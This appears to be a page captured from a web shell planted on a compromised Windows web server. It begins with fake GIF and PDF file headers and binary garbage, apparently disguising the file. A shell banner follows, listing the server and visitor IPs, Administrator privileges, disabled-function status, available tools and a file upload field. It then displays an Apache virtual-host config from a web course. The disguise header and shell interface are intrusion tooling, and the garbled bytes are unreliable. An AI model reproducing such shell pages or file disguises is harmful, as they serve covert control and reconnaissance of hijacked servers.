GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST1611/Resources/Week/11/ |
Upload File : |
# 11.conf AddType text/html .shtml AddOutputFilter INCLUDES .shtml <VirtualHost *> DocumentRoot "C:/CST1611/Week/11" ServerName dynamic.test ErrorLog logs/localhost.Error.log CustomLog logs/localhost.Access.log common DirectoryIndex index.shtml index.html <Directory "C:/CST1611/Week/11/"> Options All +MultiViews AllowOverride All Require all granted </Directory> Alias "/ssi.html" "C:/CST1611/Week/11/ssi.shtml" #AddHandler cgi-script .cgi .pl AddHandler cgi-script .cmd </VirtualHost> # perl AddHandler cgi-script .pl # php # PHP8 module PHPIniDir "C:/php" LoadModule php_module "C:/php/php8apache2_4.dll" AddType application/x-httpd-php .php .phtml # python AddHandler cgi-script .py